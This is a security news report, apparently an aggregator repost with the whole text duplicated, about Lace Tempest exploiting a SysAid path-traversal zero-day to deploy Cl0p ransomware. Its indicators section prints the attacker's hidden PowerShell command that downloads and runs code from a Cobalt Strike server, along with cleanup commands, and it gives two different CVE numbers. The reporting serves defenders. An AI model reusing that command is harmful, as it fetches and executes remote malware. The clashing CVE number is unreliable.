MOVEit Hackers Turn to SysAid Servers Zero-Day Vulnerability
- С сайта: Zero-Day(cybersecuritynews.com)
- Вернуться к списку новостей
С сайта: Zero-Day(cybersecuritynews.com)
As previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.
Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.
Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.
This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.
Rapid7 Analysis
According to the reports shared with Cyber Security News, Rapid7 has been analyzing this vulnerability on SysAid servers. SysAid’s security advisory mentioned that the threat actor used this vulnerability to upload a WAR archive consisting of WebShell and other payloads.
These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.
However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.
SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.
📁🄳🄾🄲🅄🄼🄴🄽🅃
Mitigation
CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.
Indicators of Compromise
Hashes
Filename Sha256 Comment user.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dMalicious loaderMeshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe remote admin tool
IP Addresses
IP Comment 81.19.138[.]52GraceWire Loader C245.182.189[.]100GraceWire Loader C2179.60.150[.]34Cobalt Strike C245.155.37[.]105Meshagent remote admin tool (C2)
File Paths
Path Comment C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exeGraceWireC:\Program Files\SysAidServer\tomcat\webapps\usersfiles.warArchive of WebShells and tools used by the attackerC:\Program Files\SysAidServer\tomcat\webapps\leaveUsed as a flag for the attacker scripts during execution
Commands
CobaltStrike
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Post-Compromise Cleanup
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user.exe”.
Antivirus Detections
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
#Cyber_Security_News #Vulnerability #Zero-Day #vulnerability #Zero_day
Оригинальная версия на сайте:
MOVEit Hackers Turn to SysAid Servers Zero-Day Vulnerability
Author: Balaji NAs previously reported, SysAid disclosed a zero-day issue affecting on-premises SysAid servers. The vulnerability was found to be a path traversal vulnerability and was given CVE-2023-47426.
Additionally, SysAid stated that there were reports of Lace Tempest exploiting the vulnerability in the wild.
Moreover, Microsoft Threat Intelligence Team analysis mentioned that the Lace Tempest threat actor has exploited this vulnerability to deploy Cl0p ransomware on affected systems.
This threat actor is the same who exploited MOVEit Transfer applications and GoAnywhere MFT extortion attacks.
Rapid7 Analysis
According to the reports shared with Cyber Security News, Rapid7 has been analyzing this vulnerability on SysAid servers. SysAid’s security advisory mentioned that the threat actor used this vulnerability to upload a WAR archive consisting of WebShell and other payloads.
These were uploaded to the root of SysAid’s Tomcat web service as part of exploitation. It was also reported that the threat actors used three processes, spoolsv.exe, msiexec.exe, and svchost.exe, for exploitation purposes.
However, post-exploitation was done by deploying the MeshAgent remote administration tool and GraceWire malware on the affected devices.
SysAid claims to have 5000 customers and has been proactively communicating with them for mitigation steps. SysAid has also released patches to fix these vulnerabilities.
📁🄳🄾🄲🅄🄼🄴🄽🅃
Mitigation
CVE-2023-47246, which exists in SysAid On-premises servers, can be fixed in version 23.3.36. Customers of SysAid servers are recommended to apply the necessary patches as a priority to prevent threat actors from exploiting the weaknesses on the servers.
Indicators of Compromise
Hashes
Filename Sha256 Comment user.exeb5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4dMalicious loaderMeshagent.exe2035a69bc847dbad3b169cc74eb43fc9e6a0b6e50f0bbad068722943a71a4ccaMeshagent.exe remote admin tool
IP Addresses
IP Comment 81.19.138[.]52GraceWire Loader C245.182.189[.]100GraceWire Loader C2179.60.150[.]34Cobalt Strike C245.155.37[.]105Meshagent remote admin tool (C2)
File Paths
Path Comment C:\Program Files\SysAidServer\tomcat\webapps\usersfiles\user.exeGraceWireC:\Program Files\SysAidServer\tomcat\webapps\usersfiles.warArchive of WebShells and tools used by the attackerC:\Program Files\SysAidServer\tomcat\webapps\leaveUsed as a flag for the attacker scripts during execution
Commands
CobaltStrike
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘http://179.60.150[.]34:80/a’)
Post-Compromise Cleanup
Remove-Item -Path “$tomcat_dir\webapps\usersfiles\leave”.
Remove-Item -Force “$wapps\usersfiles.war”.
Remove-Item -Force “$wapps\usersfiles\user.*”.
& “$wapps\usersfiles\user.exe”.
Antivirus Detections
Trojan:Win32/TurtleLoader
Backdoor:Win32/Clop
Ransom:Win32/Clop
#Cyber_Security_News #Vulnerability #Zero-Day #vulnerability #Zero_day
Оригинальная версия на сайте:
